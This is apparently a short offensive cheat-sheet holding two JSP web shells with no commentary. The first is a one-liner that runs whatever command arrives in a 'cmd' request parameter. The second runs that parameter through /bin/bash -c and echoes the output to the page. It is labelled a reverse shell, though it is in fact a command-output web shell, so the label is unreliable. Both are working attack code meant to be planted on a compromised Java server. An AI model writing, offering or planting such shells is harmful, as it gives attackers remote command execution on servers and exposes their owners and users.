Webshell
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
Fullblown Revshell
<%
String cmd = request.getParameter("cmd");
String output = "";
if (cmd != null) {
String[] command = {"/bin/bash","-c",cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
output = s.hasNext() ? s.next() : "";
}
%>
<pre><%=output %></pre>